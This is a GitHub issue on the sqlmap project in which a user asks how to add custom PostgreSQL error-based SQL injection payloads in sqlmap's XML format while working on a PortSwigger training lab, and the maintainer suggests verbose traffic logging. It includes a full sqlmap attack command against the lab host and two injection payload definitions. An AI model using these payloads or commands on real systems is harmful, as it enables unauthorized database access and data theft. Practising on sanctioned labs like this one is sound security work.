sqlmapproject / sqlmap

Automatic SQL injection and database takeover tool
http://sqlmap.org

Need More Payloads into Sqlmap's Arsenal #5787

Closed Gill1000 closed 2 months ago

Gill1000 commented 2 months ago

Need more payloads, or a way to add custom payloads to the XML files. I tried to add a payload from ghauri: https://github.com/r0oth3x49/ghauri/blob/main/ghauri/common/payloads.py

To be specific, I'm trying to solve the Burp lab "Visible error-based SQL injection" with sqlmap. In all previous labs sqlmap found the injection successfully, but not in this one. I'm using --technique=E and --dbms=postgresql to save time. This was my original command:

sqlmap -u "https://0a7a0024036043e082c59c7700cc0059.web-security-academy.net:443/filter?category=Pets" --cookie="TrackingId=VK0rw53WAfJ3M493; session=NzzWUBD47aOlV5WZllNOzeJmo8kHcVq7" --random-agent --ignore-code=400,401,403,500 -p "TrackingId" --threads 2 --dbs --batch --dbms=postgresql --technique=E

I even tried the error-based payload for PostgreSQL from ghauri (lines 1611-1653) by converting it into XML format (I did take some help from ChatGPT, but I still think something is wrong with it). Here is the XML:

<test>
    <title>PostgreSQL error-based - Parameter replace</title>
    <stype>2</stype>
    <level>1</level>
    <risk>1</risk>
    <clause>1,2,3,9</clause>
    <where>3</where>
    <!-- The CHR() sequences build ghauri's fixed delimiters 'r0oth3x49~' and '~END',
         but the <grep> below looks for [DELIMITER_START]/[DELIMITER_STOP], which sqlmap
         replaces with its own random markers at run time, so the grep cannot match what
         this payload makes the server echo. An error-based <vector> also needs [QUERY]
         (the query whose result is retrieved) rather than [INFERENCE], and with
         <where>3</where> (parameter replace) the leading "AND" is not expected. -->
    <vector>AND 9141=CAST(((CHR(114)||CHR(48)||CHR(111)||CHR(116)||CHR(104)||CHR(51)||CHR(120)||CHR(52)||CHR(57)||CHR(126)))||[INFERENCE]::text||(CHR(126)||CHR(69)||CHR(78)||CHR(68)) AS NUMERIC)</vector>
    <request>
        <payload>AND 9141=CAST(((CHR(114)||CHR(48)||CHR(111)||CHR(116)||CHR(104)||CHR(51)||CHR(120)||CHR(52)||CHR(57)||CHR(126)))||1337::text||(CHR(126)||CHR(69)||CHR(78)||CHR(68)) AS NUMERIC)</payload>
    </request>
    <response>
        <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
    </response>
    <details>
        <dbms>PostgreSQL</dbms>
    </details>
</test>
<test>
    <title>PostgreSQL error-based - Parameter replace (GENERATE_SERIES)</title>
    <stype>2</stype>
    <level>5</level>
    <risk>1</risk>
    <clause>1,2,3,9</clause>
    <where>3</where>
    <vector>(CAST('[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]' AS NUMERIC))</vector>
    <request>
        <payload>(CAST('[DELIMITER_START]'||(SELECT 1 FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) LIMIT 1)::text||'[DELIMITER_STOP]' AS NUMERIC))</payload>
    </request>
    <response>
        <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
    </response>
    <details>
        <dbms>PostgreSQL</dbms>
    </details>
</test>

Long story short: how do I add effective payloads to the XML files? I also checked the closed issues for more info but couldn't find any. While creating the custom payload XML, I checked sqlmap's XML files for the payload format.

Let me know if I'm doing something wrong.

Thank you in advance!! @stamparm

stamparm commented 2 months ago

You should definitely run everything with -v 5 or -t traffic.txt and inspect the server's responses. If you are expecting error-based SQLi, then you should get more than informative messages from the server if you try to send these kinds of payloads.